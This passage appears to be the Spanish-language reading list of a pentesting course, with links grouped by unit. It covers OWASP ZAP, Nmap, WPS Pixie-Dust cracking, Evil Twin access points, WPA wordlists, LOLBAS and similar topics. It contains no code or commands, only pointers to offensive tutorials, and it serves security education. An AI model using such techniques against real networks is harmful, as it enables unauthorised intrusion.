| INCIBE-CERT – DrDoS | https://www.incibe-cert.es/blog/drdos-caracteristicas-y-funcionamiento | Documentación oficial | UD2 |
| inSSIDer – Analizador WiFi | https://www.metageek.com/products/inssider/ | Referencia | UD3 |
| Jargon File – jerga hacker | https://parceladigital.com/articulo/jargon-file-la-jerga-hacker | Blog/artículo | UD1 |
| Kali Forums – Pixie-Dust WPS | https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-%28Offline-WPS-Attack%29 | Tutorial | UD3 |
| La Cripta del Hacker – WEP roto | https://lacriptadelhacker.wordpress.com/2022/01/06/hacking-wifi-por-que-el-protocolo-wep-esta-roto/ | Blog/artículo | UD3 |
| laprovittera – Autenticación en ZAP | https://laprovittera.com/dominando-la-autenticacion-en-zap/ | Tutorial | UD4 |
| laprovittera – Escaneo activo y alertas ZAP | https://laprovittera.com/escaneo-activo-y-alertas-en-zap/ | Tutorial | UD4 |
| laprovittera – Escaneo con ZAP | https://laprovittera.com/escaneo-con-owasp-zap/ | Tutorial | UD4 |
| laprovittera – Herramientas avanzadas ZAP | https://laprovittera.com/herramientas-avanzadas-de-zap/ | Tutorial | UD4 |
| laprovittera – Informes y automatización ZAP | https://laprovittera.com/informes-y-automatizacion-en-zap/ | Tutorial | UD4 |
| laprovittera – Introducción OWASP ZAP | https://laprovittera.com/introducion-a-owasp-zap/ | Tutorial | UD4 |
| laprovittera – Pentesting con ZAP | https://laprovittera.com/pentesting-con-zap/ | Tutorial | UD4 |
| laprovittera – Spider y Ajax Spider ZAP | https://laprovittera.com/uso-de-spider-ajax-spider-en-zap/ | Tutorial | UD4 |
| laprovittera – ZAP Marketplace | https://laprovittera.com/zap-marketplace-ecosistema-de-complementos-para-pentesting/ | Tutorial | UD4 |
| Legal Consultors – Ley de Hacking | https://legalconsultors.es/ley-de-hacking-debo-reportar-vulnerabilidades/ | Documentación oficial | UD1 |
| linux-console.net – NMAP en Kali | https://es.linux-console.net/?p=1608 | Tutorial | UD2 |
| L0phtCrack | https://l0phtcrack.gitlab.io/ | Referencia | UD5 |
| LOLBAS Project | https://lolbas-project.github.io/ | Documentación oficial | UD5 |
| Mail-Tester | https://www.mail-tester.com/ | Referencia | UD1 |
| Manning – Animación HTTP/1.1 vs HTTP/2 | https://freecontent.manning.com/animation-http-1-1-vs-http-2-vs-http-2-with-push/ | Vídeo/animación | UD4 |
| mclibre.org – SQL Injection PHP | https://www.mclibre.org/consultar/php/lecciones/php-db-inyeccion-sql.html | Tutorial | UD2 |
| MDN – Content Security Policy | https://developer.mozilla.org/es/docs/Web/HTTP/CSP | Documentación oficial | UD4 |
| melix.mx – Introducción NMAP | http://melix.mx/~bli/conf/nmap/nmap.html | Tutorial | UD2 |
| Microsoft Docs – Seguridad SMB | https://learn.microsoft.com/es-es/windows-server/storage/file-server/smb-security | Documentación oficial | UD2 |
| mobile-hacker.com – Ataques WPS NetHunter | https://www.mobile-hacker.com/2023/10/31/nethunter-hacker-x-wps-attacks/ | Tutorial | UD3 |
| mobile-hacker.com – Evil Twin NetHunter | https://www.mobile-hacker.com/2023/10/05/nethunter-hacker-ix-use-mana-toolkit-to-create-wi-fi-rogue-access-point-and-intercept-traffic/ | Tutorial | UD3 |
| MXToolbox – DNS Lookup | https://mxtoolbox.com/DnsLookup.aspx | Referencia | UD1 |
| MXToolbox – SPF Checker | https://mxtoolbox.com/spf.aspx | Referencia | UD1 |
| naseros.com – 802.11ac Wave 2 / MU-MIMO | https://naseros.com/2018/11/05/802-11-ac-wave-2-beamforming-y-mu-mimo/ | Blog/artículo | UD3 |
| noticiasseguridad.com – RKE hackear coche | https://noticiasseguridad.com/seguridad-informatica/como-hackear-un-auto-con-vulnerabilidades-de-remote-keyless-entry-rke/ | Blog/artículo | UD3 |
| NVD / NIST | https://nvd.nist.gov | Documentación oficial | UD1, UD2 |
| OWASP ZAP – Uso INCIBE (YouTube) | https://www.youtube.com/watch?v=1InikJ74654 | Vídeo | UD4 |
| Pixie-Dust – wifi-libre (archivo web) | https://web.archive.org/web/20230330021239/https://www.wifi-libre.com/topic-57-pixie-dust-ataque-de-fuerza-bruta-offline-para-generar-el-pin-valido.html | Tutorial | UD3 |
| protecciondatos-lopd.com – escaneo puertos legal | https://protecciondatos-lopd.com/empresas/escaneo-de-puertos/#Escanear_puertos_es_siempre_legal | Documentación oficial | UD2 |
| protegermipc.net – Tutorial NMAP | https://protegermipc.net/2018/11/07/tutorial-y-listado-de-comandos-mas-utiles-para-nmap/ | Tutorial | UD2 |
| RA en PKI – techtarget | https://www.techtarget.com/searchsecurity/definition/registration-authority | Blog/artículo | UD4 |
| redeszone.net – BIND DNS en Linux | https://www.redeszone.net/tutoriales/servidores/configurar-servidor-dns-bind-linux/ | Tutorial | UD1 |
| redeszone.net – MU-MIMO WiFi | https://www.redeszone.net/tutoriales/redes-wifi/mu-mimo-que-es-mejora-rendimiento-wifi/ | Blog/artículo | UD3 |
| redeszone.net – WPS crackeado | https://www.redeszone.net/tutoriales/redes-wifi/metodos-crackear-wps-routers-wifi/ | Tutorial | UD3 |
| RIPE NCC – ripe.db.gz | https://ftp.ripe.net/ripe/dbase/ | Documentación oficial | UD1 |
| securityartwork.es – ZigBee | https://www.securityartwork.es/2023/01/24/introduccion-a-zigbee/ | Blog/artículo | UD3 |
| Sector443 – awesome pentesting reports | https://github.com/Sector443/awesome-list-of-public-pentesting-reports | GitHub | UD1 |
| Shell Detector | http://www.shelldetector.com/ | Otros recursos | UD4 |
| Shodan CLI – Documentación oficial | https://cli.shodan.io/ | Documentación oficial | UD1 |
| SSLLabs – Test SSL/TLS | https://www.ssllabs.com/ | Referencia | UD4 |
| thehackerway.com – Informe pentesting Parte 1 | https://thehackerway.com/2021/06/24/como-crear-un-informe-de-pentesting-parte-1-de-2/ | Tutorial | UD1 |
| thehackerway.com – Informe pentesting Parte 2 | https://thehackerway.com/2021/06/28/como-crear-un-informe-de-pentesting-parte-2-de-2/ | Tutorial | UD1 |
| unaaldia hispasec – CVSS 4.0 | https://unaaldia.hispasec.com/2023/11/cvss-4-0-nueva-version-de-evaluacion-de-vulnerabilidades.html | Blog/artículo | UD2 |
| vanhoefm/macstealer – GitHub | https://github.com/vanhoefm/macstealer | GitHub | UD3 |
| ViewDNS.info | https://viewdns.info/ | Referencia | UD1 |
| W3Techs – estadísticas HTTP/2 | https://w3techs.com/technologies/details/ce-http2 | Referencia | UD4 |
| Wikipedia – XML External Entity | https://en.wikipedia.org/wiki/XML_external_entity_attack | Referencia | UD4 |
| wirelesshack.org – Diccionarios WPA | https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html | Referencia | UD3 |
| Xataka – Bluetooth BIAS | https://www.xataka.com/seguridad/bias-nueva-vulnerabilidad-bluetooth-que-afecta-a-todos-dispositivos-no-actualizados-recientemente | Blog/artículo | UD3 |
| Xataka – WiFi 6 | https://www.xataka.com/especiales/que-wifi-6-que-va-a-mejorar-tu-red-wifi-casa-cuando-te-conectes-a-publica | Blog/artículo | UD3 |
| Xataka – WiFi 6E vs WiFi 6 | https://www.xataka.com/basics/wifi-6e-vs-wifi-6-que-cuales-sus-diferencias | Blog/artículo | UD3 |
| XatakAndroid – Bluetooth BLUFFS | https://www.xatakandroid.com/seguridad/no-vas-a-usar-bluetooth-mejor-que-apagues-lugares-publicos-asi-peligrosos-ataques-bluffs | Blog/artículo | UD3 |
| Zero Day Initiative (ZDI) | https://www.zerodayinitiative.com/ | Documentación oficial | UD2 |

---


